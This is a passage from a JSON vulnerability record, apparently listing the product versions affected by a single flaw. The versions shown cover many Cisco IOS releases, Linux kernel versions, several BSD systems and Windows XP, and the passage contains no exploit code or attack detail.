            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)t8"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.20"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.46"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yw"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.33"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5a\\)b5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xk"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.8"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.16"
          },
          {
            "_id": null,
            "model": "midnightbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "midnightbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20.4\\)sp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)za"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(1\\)xa3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.29"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1\\)e5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)s9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(2\\)xf5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)xc4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(22\\)sy"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(9\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1eu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1ca"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zn"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.21.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2sa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xm"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(26e\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(14\\)st"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sea"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)xe3"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.10"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.34"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ez"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(14\\)e1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(12e\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0sz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yg3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(9\\)xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(5\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yn"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)st"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)xk"
          },
          {
            "_id": null,
            "model": "bsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsd",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)tpc10a"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.18"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)t4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.18"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)bz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)yq4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)xu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)xi4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(28\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1\\)db2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)by2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.14.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)s6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.13.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0da"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sxb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(1\\)st"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ys"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(9a\\)bc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(3.2\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zn"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.0"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)se3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)s2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12c\\)ev01"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(5\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)yq"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(3.3\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ew2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.17"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(10a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)xs"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)ja1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20\\)sx"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1yj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zh3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)bc1f"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ya8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xe4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1eb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(6\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(30\\)s1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.18"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.35.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(14\\)ea1"
          },
          {
            "_id": null,
            "model": "dragonflybsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dragonflybsd",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)xl3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2p"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "10.3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(8\\)db2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(8.9\\)sa6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(23\\)s4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10\\)aa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xe"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.16"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)t4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1cc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(11b\\)t2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)st1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0\\(22b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(5d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)t8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xn"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xk"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.22"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xd1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13e\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8a\\)ew1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)yy3"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.31"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(10\\)bc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0ev"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xc1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)cx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yl"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.38"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(6\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15.11"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(14\\)s8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4.3\\)t"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.67"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.20"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5a\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0\\(18\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)s13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6.5\\)ec3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ya7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12c\\)e7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xs1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(18\\)s5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(7\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)ewa2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.35"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(9\\)ea"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(36\\)cc2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)xu2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(30\\)s2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8\\)ea"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.32"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(15\\)sl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)db"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.30"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(6f\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)ja"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(10e\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)ew3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4a\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1b\\)da1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(3.4\\)bp"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(15\\)s"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.13.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(23.6\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)s2a"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)s8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xr"
          },
